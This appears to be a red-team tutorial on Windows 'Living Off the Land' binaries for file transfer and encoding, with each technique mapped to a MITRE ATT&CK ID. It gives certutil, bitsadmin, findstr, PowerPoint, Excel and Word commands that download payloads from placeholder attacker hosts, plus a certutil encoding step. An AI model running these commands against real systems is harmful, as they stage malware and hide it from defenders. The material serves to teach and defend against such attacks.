File Operations

Theory

Here, we will show commonly used tools used by "Living Off the Land" techniques about file operations including download, upload, and encoding. This techniques are covered by the LOLBAS project

Practice

Certutil is a Windows built-in utility for handling certification services. It is used to dump and display Certification Authority (CA) configuration information and other CA components. However, people found that certutil.exe could transfer and encode files unrelated to certification services.

#Dowload a file
certutil -URLcache -split -f http://Attacker_IP/payload.exe C:\Windows\Temp\payload.exe

#Encode a file
certutil -encode payload.exe Encoded-payload.txt

The MITRE ATT&CK framework identifies this techniques as Ingress tool transfer (T1105) and Obfuscated Files or Information (T1027)

The bitsadmin tool is a system administrator utility that can be used to create, download or upload Background Intelligent Transfer Service (BITS) jobs and check their progress. BITS is a low-bandwidth and asynchronous method to download and upload files from HTTP webservers and SMB servers. Additional information about the bitsadmin tool can be found at Microsoft Docs.

#Dowload a file
bitsadmin.exe /transfer /Download /priority Foreground http://<ATTACKER_IP>/payload.exe c:\Users\Pwned\Desktop\payload.exe

The MITRE ATT&CK framework identifies this technique as BITS Job (T1197)

Findstr is a Microsoft built-in tool used to find text and string patterns in files. The findstr tool is useful in that helps users and system administrators to search within files or parsed output. However, an unintended way was found by using findstr.exe to download remote files from SMB shared folders within the network as follows,

#Dowload a file
findstr /V dummystring \\MachineName\ShareFolder\test.exe > c:\Windows\Temp\test.exe

he MITRE ATT&CK framework identifies this technique as Ingress tool transfer (T1105)

We may use binaries part of Office 365 (Word, Excel, Powerpoint) to download malicious payloads. It will download a remote payload and place it in the cache folder

#Dowload a file using PowerPoint
Powerpnt.exe "http://<ATTACKING_IP>/TeamsAddinLoader.dll"

#Dowload a file using Excel
Excel.exe http://<ATTACKING_IP>/TeamsAddinLoader.dll

#Dowload a file using Word
winword.exe "http://<ATTACKING_IP>/TeamsAddinLoader.dll"